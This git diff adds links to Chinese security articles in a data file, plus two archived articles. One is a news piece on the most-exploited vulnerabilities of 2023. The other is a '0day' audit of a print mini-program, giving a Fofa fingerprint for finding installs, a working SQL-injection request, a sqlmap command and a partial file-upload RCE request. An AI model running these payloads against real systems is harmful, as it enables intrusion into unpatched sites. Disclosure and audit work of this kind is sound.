diff --git a/data.json b/data.json index e73e0719..9aaa32b3 100644 --- a/data.json +++ b/data.json @@ -36,5 +36,34 @@ "https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&mid=2651388483&idx=1&sn=070fb6976ee52108d263858115ea9bfd&chksm=8d398bcbba4e02ddbe0183f79c2682bbf1cab54e4ba6bb0697fdc56e297e7303aa9eb938b9e6&scene=58&subscene=0": "2024年网络安全漏洞研究人才培养交流活动成功举办", "https://mp.weixin.qq.com/s/O2Ohp_ceYrTo8hppX09fkw": "(0day)微信公众号商家收银台小程序系统存在前台任意文件上传漏洞", "https://mp.weixin.qq.com/s/tbEXIAPT-Vumch-WyoGZHQ": "代码审计-某oa任意文件读取(1day)", - "https://mp.weixin.qq.com/s/73CXvF4ejvgS40OetzXr8A": "(0day)全新优客API接口管理系统代码审计" + "https://mp.weixin.qq.com/s/73CXvF4ejvgS40OetzXr8A": "(0day)全新优客API接口管理系统代码审计", + "https://mp.weixin.qq.com/s?__biz=MzkwODM3NjIxOQ==&mid=2247502141&idx=1&sn=f7e19ad84c7a39f767da0b54cad21967": ".md", + "https://mp.weixin.qq.com/s?__biz=Mzg4NTg5MDQ0OA==&mid=2247487335&idx=1&sn=c2800f225873a4a1b38711bacba10316": "AI代码审计和POC编写", + "https://mp.weixin.qq.com/s?__biz=MzA3NTc0MTA1Mg==&mid=2664712071&idx=1&sn=98356c1f6829546d47af1e4d43f89ace": "Fckeditor编辑器漏洞汇集", + "https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247517203&idx=2&sn=3074826837ddd653a7d1ae03a600a0b4": "建了个SRC专项漏洞知识库", + "https://mp.weixin.qq.com/s?__biz=Mzk0MzI2NzQ5MA==&mid=2247486636&idx=1&sn=5d9cfbe6b8393b15c60b04ca9c2c9588": ".md", + "https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487499&idx=1&sn=4ad7e59489c09ab80bee906e929b311a": "【漏洞预警】 用友BIP 数据库配置信息泄露", + "https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487499&idx=3&sn=b3cf1540ab72404aab438e963c5e761d": "【漏洞预警】 易宝OA-GetProductInv SQL注入漏洞", + "https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487499&idx=4&sn=69d6613ba3812956a0388203252d7a8f": ".md", + "https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247492449&idx=2&sn=ded00a05c99093340d9c413be00b1a5a": "PostgreSQL数据库存在高危漏洞CVE-2024-10979(8.8)", + "https://mp.weixin.qq.com/s?__biz=MzkxNzUxMjU5OQ==&mid=2247484847&idx=1&sn=ab525f7b54b1842379879fcb44279dfe": ".md", + "https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247523915&idx=1&sn=0522e35aa0afa2167e0dfd9d5a6954d7": "CVE-2024-28888:福昕阅读器中使用释放后导致远程代码执行", + "https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066024&idx=4&sn=46592438737abae8701b9ba1b7160d86": ".md", + "https://mp.weixin.qq.com/s?__biz=Mzg4MTkwMTI5Mw==&mid=2247486133&idx=1&sn=a795a853e80c985de5fceca4309365ce": "(0day)某全新UI自助打印微信小程序系统SQL+RCE漏洞代码审计", + "https://mp.weixin.qq.com/s?__biz=MzUyODkwNDIyMg==&mid=2247545126&idx=1&sn=b2f2e3d1dba89c587651768a66070b2d": "攻防演练 | 一次近源渗透", + "https://mp.weixin.qq.com/s?__biz=Mzk0ODM0NDIxNQ==&mid=2247492730&idx=1&sn=4830f7a0e4dfa7e50b8fb0ccc7e0e0b9": "一款java漏洞集合工具", + "https://mp.weixin.qq.com/s?__biz=Mzk0Mzc1MTI2Nw==&mid=2247485338&idx=1&sn=615b6a9ca710339fdd1b48528711a058": ".md", + "https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651307299&idx=1&sn=467809755fdcc647cdde9f67ad9a27a2": "打补丁要快!0Day漏洞正在被黑客广泛利用", + "https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651307299&idx=4&sn=faa8ef20c4f618771d92d2e34863625b": "Velociraptor:一款终端节点可视化与数据收集工具", + "https://mp.weixin.qq.com/s?__biz=MzI2NzAwOTg4NQ==&mid=2649793147&idx=3&sn=c17de8d66d7e37e8209eab45ef7f5654": "Palo Alto Networks 确认存在新的防火墙0day漏洞", + "https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650603612&idx=4&sn=1ca7d7d27c71f41ef3992ddac7cda038": "Vcenter图形化漏洞利用工具", + "https://mp.weixin.qq.com/s?__biz=MzkyNzIxMjM3Mg==&mid=2247488171&idx=1&sn=dbbce680730d50271fcb4e886e029f36": "VulToolsKit一把梭漏洞Exploit合集", + "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491421&idx=1&sn=653b49f157760ea962f45f3e9471858c": "漏洞预警 | Apache ZooKeeper身份验证绕过漏洞", + "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491421&idx=2&sn=89f3fc90da6871059bb0ea398e1ffb26": "漏洞预警 | XStream栈溢出漏洞", + "https://mp.weixin.qq.com/s?__biz=MzkwMTQ0NDA1NQ==&mid=2247491421&idx=3&sn=eabce5e15b6befff94c2407acd4a5aa9": "漏洞预警 | HPE Aruba Networking Access Points命令注入漏洞", + "https://mp.weixin.qq.com/s?__biz=MzU3MjU4MjM3MQ==&mid=2247488371&idx=2&sn=3ad1f97fe2651cfd09c4aa8767ee6a6d": "【漏洞复现】用友YonBIP高级版存在任意文件读取漏洞", + "https://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486789&idx=1&sn=9e271a3346eed986ecc5b7a4aece7f88": "compiler explorer 轻松从汇编角度理解代码", + "https://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486789&idx=2&sn=f8617e893d02f1eaca70fb0f9661a3e3": "网太CMS漏洞复现", + "https://mp.weixin.qq.com/s?__biz=Mzg2NjY2MTI3Mg==&mid=2247497601&idx=1&sn=1b31fff83d5276667f7ead2ae5de2a6b": "微软2024年11月份于周二补丁日针对90漏洞发布安全补丁", + "https://mp.weixin.qq.com/s?__biz=Mzg2NjY2MTI3Mg==&mid=2247497601&idx=2&sn=413b3330c9fde967c520582aefbd4bd6": "2023年最易被利用的漏洞" } \ No newline at end of file diff --git a/doc/(0day)某全新UI自助打印微信小程序系统SQL+RCE漏洞代码审计.md b/doc/(0day)某全新UI自助打印微信小程序系统SQL+RCE漏洞代码审计.md new file mode 100644 index 00000000..a83bd41e --- /dev/null +++ b/doc/(0day)某全新UI自助打印微信小程序系统SQL+RCE漏洞代码审计.md @@ -0,0 +1,260 @@ +# (0day)某全新UI自助打印微信小程序系统SQL+RCE漏洞代码审计 +原创 Mstir 星悦安全 2024-11-16 04:37 + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/lSQtsngIibibSOeF8DNKNAC3a6kgvhmWqvoQdibCCk028HCpd5q1pEeFjIhicyia0IcY7f2G9fpqaUm6ATDQuZZ05yw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +点击上方 +蓝字关注我们 并设为 +星标 +## 0x00 前言 + +**在数字化时代,打印服务的需求与日俱增。为了满足用户的便利需求,全新UI的自助打印系统/云打印小程序。** + +**全新UI设计:采用2024年最新的UI设计风格,界面简洁美观,用户体验极佳。** + +**云打印功能:支持用户通过小程序上传文件并进行云端打印,方便快捷。** + +**自助服务:用户可以自主选择打印参数,如打印份数、纸张类型等,实现真正的自助打印。** + +**多平台支持:源码支持微信小程序平台,方便用户在移动端进行操作。** + +**Fofa指纹:"未登录" && "/admin/login/index.html"** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmpLI5AKHbcMk7tQAXzWfnOhKOg03ACURvxO4qtxdNVjw64VyzpGWU1g/640?wx_fmt=png&from=appmsg "") +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmLib7MD3jLLyO8DoQ5V8nm7tUW9ibHZ7pVDPfsF9iarOaR3yMpptt4ibIAQ/640?wx_fmt=png&from=appmsg "") +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmY5ic29Gia85nW5yUOgz0bLibeV3L4cduZhwbdfZR6DxR6Ot1EmNFjXTDw/640?wx_fmt=png&from=appmsg "") + +**框架:ThinkPHP 6.0.2 Debug:True** +## 0x01 前台SQL注入漏洞 + +**位于 /api/controller/Shop.php 控制器的nearByShop 方法通过传入latitude和longitude 来插入到SQL语句中,然后直接通过 Db::query() 进行查询,且未有过滤,导致漏洞产生.** +``` +public function nearByShop() + { + $latitude = input('param.latitude', ''); + $longitude = input('param.longitude', ''); + $sql = <<where($where)->select(); + if (!empty($printer)) { + foreach ($printer as $k => $v) { + $v['business_hours'] = json_decode($v['business_hours'] ?? '[]', true); + //$v['print'] = json_decode($v['print'] ?? '[]', true); + $v['functions'] = json_decode($v['functions'] ?? '[]', true); + + foreach ($data as $shop) { + if ($shop['id'] == $v['shop_id']) { + $v['shop_name'] = $shop['name']; + $v['distance'] = intval($shop['distance'] * 1000); + } + } + + $printer[$k] = $v; + } + } + } + + $return = [ + 'code' => 0, + 'data' => [ + 'shop' => $data, + 'printer' => $printer, + ], + ]; + + return json($return); + } +``` + +**Payload:** +``` +POST /api/shop/nearByShop HTTP/1.1 +Content-Length: 104 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +Host: 127.0.0.1:81 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Connection: close + +latitude=1&longitude=GTID_SUBSET(CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),1,190))),9392) +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmFenCTZdmkuTHmRap2icbhHAOoH2IX2o1anoWjc0u81f6kQCLSyqmzXA/640?wx_fmt=png&from=appmsg "") + +**python sqlmap.py -r a.txt --level=3 --dbms=mysql** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmg2pv8vtZg6kicYj53OmOiaddoDlhgibRtExo5HT8luUm3IbTOZxpg4bbg/640?wx_fmt=png&from=appmsg "") +## 0x02 前台任意文件上传漏洞(RCE) + +**位于 /xxxx/controller/xxxxx.php 控制器中的file方法通过file()函数获取文件,并通过 putFile() 函数 直接将文件写入到/sxxxxx/ 目录中,然后传入 proxxx=xxxxx 进入该分支即可得到上传文件的地址.** +``` +/** +* 处理上传文件. +* +* @return \think\response\Json +*/ +public function xxxx() +{ + $file = request()->file('file'); + $page_type = input('param.page_type', 1, 'intval'); + $print_type = input('param.print_type', 1, 'intval'); + $filename = input('param.filename', $file->getOriginalName(), 'trim'); + $doc_type = input('param.doc_type', 1, 'intval'); + $printer_id = input('param.printer_id'); + //文件处理流程 + /** + * 1.none 不处理 + * 2.id_card 身份证:不插入数据库,正反面都上传完成后,用户点击完成时合并图片,保存到打印列表 + * 3.c1 1寸照片 + * 4.c1x 大1寸照片 + * 5.c2 + * 6.c2x + * 7.photo. + */ + $process = input('param.process', 'none', 'trim'); + try { + $savename = Filesystem::disk('public')->putFile('', $file); + $root = config('filesystem.disks.public.root'); + $domain = config('filesystem.disks.public.url'); + switch ($process) { + case 'xxx_xxxxx': + $savename = Config::get('filesystem.disks.public.url').'/'.$savename; + $return = [ + 'code' => 0, + 'data' => ['savename' => $savename], + ]; + } catch (ValidateException $e) { + $return = [ + 'code' => 1, + 'msg' => $e->getMessage(), + ]; + } + + $return['printer_list'] = $this->printerList(); + + return json($return); + } +``` + +**Payload:** +``` +POST /xxxx/xxxxx/xxxx HTTP/1.1 +Host: 127.0.0.1 +Content-Length: 298 +Cache-Control: max-age=0 +Origin: http://127.0.0.1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXr8AJ9qGX4nSmcI0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Connection: close + +完整EXP请见文末!完整EXP请见文末!完整EXP请见文末! +完整EXP请见文末!完整EXP请见文末!完整EXP请见文末! +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmibBK0pAmbTpErGrhRvG9mvTLEyKE7mWhXHCjmMicmKPibslUYtTr0kvSg/640?wx_fmt=png&from=appmsg "") +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5duuuJAFpJIFYqG1ffXXkRmfKXbmbBSsLzObic4NjzhIYzRveXvwlmnG4vqBXn4aR8QSEic0Z5HoWXw/640?wx_fmt=jpeg "") +## 0x03 纷传圈子介绍 + +完整审计文章及源码放在纷传圈子里了 + +**高质量漏洞利用研究,代码审计圈子,每周至少更新三个0Day/Nday及对应漏洞的批量利用工具,团队内部POC,源码分享,星球不定时更新内外网攻防渗透技巧以及最新学习,SRC研究报告等。** + +**【圈子权益】** + +**1,一年至少999+漏洞Poc及对应漏洞批量利用工具** + +**2,各种漏洞利用工具及后续更新,渗透工具、文档资源分享** + +**3,内部漏洞库情报分享(目前已有1700+poc,会每日更新,包括部分未公开0/1day)** + +**4,加入内部微信群,遇到任何技术问题都可以进行快速提问、讨论交流;** + +**圈子目前价格为40元,现在星球有500+位师傅相信并选择加入我们** + +**** +**网站源码及漏洞库已于11.5日更新** + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5dO3JY3ibuSzzKb6JXHOsho87AiaLnO5SC57BIhrNmuPRmFKjPehD8FRjZTI1SXD6wEnbSJgujbCbbg/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5dPFicRheSpuSsBE8ZFeE6HwYQ7XZx91DUHD6M2jFjo9jwxZEnQs2PaU9jQAvYicVxtcIiaKI2QeRxqA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") +**** +**圈子内部漏********洞库(日更)** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5dO3JY3ibuSzzKb6JXHOsho8GllKEjcqXnSa6OY73aptxTiaibrLiaKrw85bDlFrRjR8aUGrxZKVQBTug/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**每篇文章均有完整指纹和详细POC** + +**** +**一起愉快地刷分** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5ff43kUoicsmnll86ficaMcTp1nDJvFuhT6INWEyGaCkEEclfEo8Ld6OBOzzJ3BkTVbrfqd41XhAhicA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5dPFicRheSpuSsBE8ZFeE6HwwvkuIIecPQwHta0wibQuCqoSTqsc2K1KZDpJb3enDibBiau4EEhxrTYxA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5ff43kUoicsmnll86ficaMcTpt1uZwVAmW8XEscyvU51uc9sdiaHViaJKMEZyiaM4bAaQfGIPNd26u2A5w/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +**上百套审计源码,包括各种协同办公OA** + +**** +**入圈之后可私信我帮你找源码,已开通各大源码站VIP** + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5ff43kUoicsmnll86ficaMcTpPGVahCuyNFFdRtlOyjb6Z1dj8LMnibicPickAJZQLpTzoBoUqy9Xun3tg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") +![](https://mmbiz.qpic.cn/sz_mmbiz_png/uicic8KPZnD5dbasJicXJDEOR85icHkfIda3gg2HpaWjW2MZN9KZdGzX99Ofl7SRETFA4TicFabIO2UGibSONn6bhXQw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +**标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转** + +**PS:关注公众号,持续更新漏洞文章** + + +**免责声明:****文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!** + diff --git a/doc/2023年最易被利用的漏洞.md b/doc/2023年最易被利用的漏洞.md new file mode 100644 index 00000000..059dfbfe --- /dev/null +++ b/doc/2023年最易被利用的漏洞.md @@ -0,0 +1,348 @@ +# 2023年最易被利用的漏洞 +何威风 河南等级保护测评 2024-11-15 16:00 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rTibWNx9ARWlr2gsy0GXlIR3oaTAYLNlTAcfSygiaibN8NtFC0qyeuZxIW8iaQCaVKpuweFc22nw6O676b5UnJPKZA/640?wx_fmt=png&from=appmsg "") + +**根据五眼情报联盟政府机构的数据,2023年最常被利用的漏洞大多最初都是以零日漏洞的形式被利用的。** + + +一份汇总数据 的 +咨询报告显示 +,与上一年相比 +,2023年利用零日漏洞攻击企业网络的情况显著增加。上一年,被利用的顶级漏洞中只有不到一半是以零日漏洞的形式被发现的。 + +数据显示,威胁行为者在漏洞公开披露后的两年内继续成功利用漏洞。 +这些机构表示:“随着越来越多的系统得到修补或替换,这些漏洞的实用性会随着时间的推移而下降。当国际网络安全努力缩短零日漏洞的寿命时,恶意网络行为者发现零日漏洞的实用性会降低 +。” + +以安全为中心的产品开发生命周期的实施、增加负责任的漏洞披露的激励以及使用复杂的端点检测和响应 (EDR) 工具,应该有助于缩短零日漏洞的寿命。 + +2023 年最容易被利用的漏洞列表以 +CVE-2023-3519 +和 +CVE-2023-4966 +开头,这两个漏洞是 Citrix NetScaler ADC 和 Gateway NetScaler 实例中的两个严重程度极高的漏洞,已于去年7月和10月进行了修补,但在前几个月都曾被用作零日漏洞进行利用。 + +该机构还重点介绍了 +CVE-2023-20198和CVE-2023-20273 +,这两个思科 IOS XE漏洞已于2023年10月修补,此前它们被用作零日漏洞,导致以 root权限执行命令。 + +Fortinet的防火墙也经常成为攻击目标,去年有威胁行为者利用 +CVE-2023-27997 +零日漏洞。攻击者无需身份验证即可远程利用此严重性漏洞在易受攻击的 FortiOS 和 FortiProxy 实例上执行任意代码。 + +被追踪为 +CVE-2023-34362 的 +MOVEit Transfer 管理文件传输 (MFT) 软件中的一个严重 SQL 注入漏洞在 Cl0p 黑客 +活动 +中被利用为零日漏洞,影响了超过 2,770 个组织和近 9600 万个人,该漏洞也是去年最常被利用的漏洞之一。 + +该机构表示,去年披露的另一个经常在攻击中使用的零日漏洞是 +CVE-2023-2868 +,这是 Barracuda 电子邮件安全网关 (ESG) 设备中的一个远程命令注入问题,在被发现之前已被利用了数月。 + +Microsoft Outlook 也经常成为恶意攻击的目标,去年威胁行为者被发现使用 +CVE-2023-23397 +,这是一个零点击漏洞,在补丁发布之前,一个俄罗斯 APT 已经将其作为零日漏洞利用了整整一年。 + +该列表还包括 +CVE-2023-22515 +,这是 Atlassian Confluence 数据中心和 Confluence 服务器中的一个严重的不当授权缺陷,在 2023 年 10 月下旬公开披露后不到一周就开始被利用。 + +在公开披露后的几天内,威胁行为者还开始利用 +PaperCut NG/MF 打印管理软件中的远程代码执行漏洞CVE  +-  + +2023-39143 +、TeamCity CI/CD 服务器中的身份验证绕过漏洞 CVE-2023-42793 以及 +ownCloud +中的信息泄露问题 CVE-2023-49103。 + +去年经常被利用的旧安全缺陷包括 +臭名昭著的 Log4Shell 漏洞 +CVE  +-2021-44228 +、Zoho ManageEngine 漏洞 CVE-2022-47966 和 +关键的 Windows Netlogon 远程协议 (MS-NRPC) 漏洞 (称为 Zerologon)  +CVE-2020-1472 。 + + + + +政府机构警告称,苹果、Atlassian、思科、大华、F5、FatPipe、Fortinet、Fortra、GitLab、Ivanti、瞻博网络、微软、Netwrix、Novi、Progress Telerik、RARLAB、Sophos、Unitronics 和 Zoho 等公司产品中的另外 32 个漏洞已频繁被利用。 + +建议供应商和开发人员识别经常被利用的漏洞类别并实施缓解措施来消除它们,实施安全的设计实践,默认使用最安全的设置配置可用于生产的产品,并列出每个已发布CVE的根本原因。 + +**组织应遵循安全最佳实践,包括实施强大的补丁管理流程、执行自动资产发现、定期备份系统、维护更新的网络安全事件响应计划、实施强密码和防网络钓鱼多因素身份验证 (MFA),以及配置最小特权访问控制和零信任网络架构。** + + +— **欢迎关注 往期回顾** + — + +[精彩回顾:祺印说信安2024之前](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103882&idx=1&sn=fe68b43898a872f40e66a8cdb720d7d7&chksm=8bbccef3bccb47e5bd52249ff6490fe17df9696568053776e4124ef70d790a5ed06f2d3c6809&scene=21#wechat_redirect) + + +[230个网络和数据安全相关法律法规规范文件打包下载](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105479&idx=2&sn=1f51edc838bc6dbe991b184178d6d0ac&chksm=8bbcc13ebccb4828eb26b14990d39068d4d1e7c3f43989dd0ade728567228036ef8f12f55208&scene=21#wechat_redirect) + + +[单位高层领导参与网络安全不应该只是口头说说](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109701&idx=1&sn=c71fdd6f2c197fa7fd1bd40b1539be2e&chksm=8bbcd1bcbccb58aad9294bb2e2079582fecf40b6fb2646e12026f017a4453a854cfea1ed7705&scene=21#wechat_redirect) + + +[党委(党组)网络安全工作责任制实施办法](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109696&idx=1&sn=18d149ee98579471afff5c7eb056d2ef&chksm=8bbcd1b9bccb58af141e591b7a9814f6c1c01413f8fc0472515b03f50356444026f10116793a&scene=21#wechat_redirect) + + +[“两高一弱”专项下,谈合规下的弱口令](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110057&idx=1&sn=b34aa34b68219a34d6e7f3ed97c1a403&chksm=8bbcd6d0bccb5fc6e0f1fba87f40441349b1e1ae98418eec649d08bcb0dd6c7676f76ba10b05&scene=21#wechat_redirect) + + +[网络被黑?还看“两高一弱” ,原来是不履行网络安全义务惹的祸](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110738&idx=1&sn=8a1eb107a95fe88afd3ee0acbc33ac18&chksm=8bbcd5abbccb5cbd0ac20564bbc40772e25befab23149eae9bb5ec338d9fe6654e7c32519c63&scene=21#wechat_redirect) + + +**>>>网络安全等级保护<<<** + +[网络安全等级保护:等级保护工作、分级保护工作、密码管理工作三者之间的关系](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652098579&idx=1&sn=56da5aedb263c64196a74c5f148af682&chksm=8bbcfa2abccb733ca8dd898d7c0b06d98244ca76bd7be343482369fa80546554cced706fa74c&scene=21#wechat_redirect) + + +[网络安全等级保护:政策与技术“七一”大合集100+篇](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108174&idx=1&sn=455ba77fd3a186100820b8d180fcd742&chksm=8bbcdfb7bccb56a17cc1d42b93895ecfb0b51a9417a5f63fc4482567c73fb46be0418d43b567&scene=21#wechat_redirect) + + +[网络安全等级保护:安全管理机构](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109115&idx=2&sn=4f1af46e726949f4d038bde63c2362ef&chksm=8bbcd302bccb5a14b71aa1c242c14636fb3f4d37710e18db76bdcb91ab74a3aaa412f1226c7f&scene=21#wechat_redirect) + + +[网络安全等级保护:网络安全事件分类分级思维导图](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109100&idx=1&sn=b0a47754b6df3f02f38daf7b7e23eb74&chksm=8bbcd315bccb5a032afa3441f65dfc391355834fbdf574ae6bce3caf42fa90766d80de1d6e84&scene=21#wechat_redirect) + + +[网络安全等级保护:明确测评双方的责任从了解测评过程指南开始(思维导图下载)](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111773&idx=1&sn=1441cfedec441d13dff9e989012e9dd0&chksm=8bbb29a4bccca0b2b266820ba86269a3baef47022ee3776e2521ad837991d1a6508f3c22bbad&scene=21#wechat_redirect) + + +**>>>数据安全系列<<<** + + +[数据安全管理从哪里开始](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103384&idx=1&sn=391073e6109ff105f02be9029e01c697&chksm=8bbcc8e1bccb41f7fe478a3d22757d61f10dcf42548c1c02c0579b8f161277e527ba98ccb542&scene=21#wechat_redirect) + + +[数据泄露的成本:医疗保健行业](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109243&idx=2&sn=cd2405090c5d26f97c602946d3f8eea1&chksm=8bbcd382bccb5a94114aa6fda3d3ba0629eb958a6b7a9711889d552a029462d64ac97e3a46da&scene=21#wechat_redirect) + + +[数据安全知识:数据安全策略规划](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104021&idx=1&sn=7f80bb27ce6ad7c9debe83c172ff9f73&chksm=8bbccf6cbccb467a0971b9de4a8b14851c2666ad6934a88b8324a1ffc4b5cf5109cbc3976697&scene=21#wechat_redirect) + + +[数据安全知识:组织和人员管理](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109274&idx=1&sn=7be5a754d4667aa47c46b16f1b4d0579&chksm=8bbcd3e3bccb5af52e3d908edb77e57505315689950e24754a3152a80528ab6745788a318ec3&scene=21#wechat_redirect) + + +[数据安全知识:数据库安全重要性](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104183&idx=2&sn=f2a98256b0497ce3a99c0ad30223bf40&chksm=8bbccfcebccb46d8aac9f8a5c8d1f46061ca61ad69b3a61d52d3dc614e1e18ae65d982a5574b&scene=21#wechat_redirect) + + +[数据安全知识:数据整理与数据清理](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105810&idx=2&sn=97ff4a8d1f2c7f3f6a0252f4df58b20b&chksm=8bbcc66bbccb4f7d058c46bc9c67d34c2042993f2ad32c7732d9816f8dfa4abb7e10f0fd307f&scene=21#wechat_redirect) + + +[数据安全知识:什么是数据存储?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108099&idx=1&sn=0ccf837988c4dc590d1fd9d634d0c02b&chksm=8bbcdf7abccb566cfa3ab37a304567fbca0833291b7f0cb99d36cdebd9d1f58ae72d03d82cd2&scene=21#wechat_redirect) + + +[数据安全知识:什么是数据风险评估?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652106123&idx=1&sn=5f1a4c50b11a1155b22e8d5f01f5c6ca&chksm=8bbcc7b2bccb4ea46d1666254d8f027d2e68d4f38a621f4d7cc05d398f342a0eabeecb29be2e&scene=21#wechat_redirect) + + +[数据安全知识:如何逐步执行数据风险评估](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652106385&idx=1&sn=a71f4b9827f82daff6b5ff61d1f66d2d&chksm=8bbcc4a8bccb4dbe639df71411c12a859b26da7b4fd84b544effc20d98426fd628af59a8c868&scene=21#wechat_redirect) + + +[数据安全知识:数据风险管理降低企业风险](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652106372&idx=2&sn=9ad51e532256b7fbe3aefdf7ec804777&chksm=8bbcc4bdbccb4dabb0cd03a18862dd076ebd798a0bd2aae82a5916e8f9a04b53e5fcd344feb6&scene=21#wechat_redirect) + + +[数据安全知识:数据整理与数据清理](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105810&idx=2&sn=97ff4a8d1f2c7f3f6a0252f4df58b20b&chksm=8bbcc66bbccb4f7d058c46bc9c67d34c2042993f2ad32c7732d9816f8dfa4abb7e10f0fd307f&scene=21#wechat_redirect) + + +[数据安全知识:什么是数据安全态势管理?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105525&idx=1&sn=8625752fb73b4da258b7df177ff8709d&chksm=8bbcc10cbccb481a1b0a68f1061dd2fdda08d2e58974c0fb3fd2c90c9fa77e0641ab814399b2&scene=21#wechat_redirect) + + 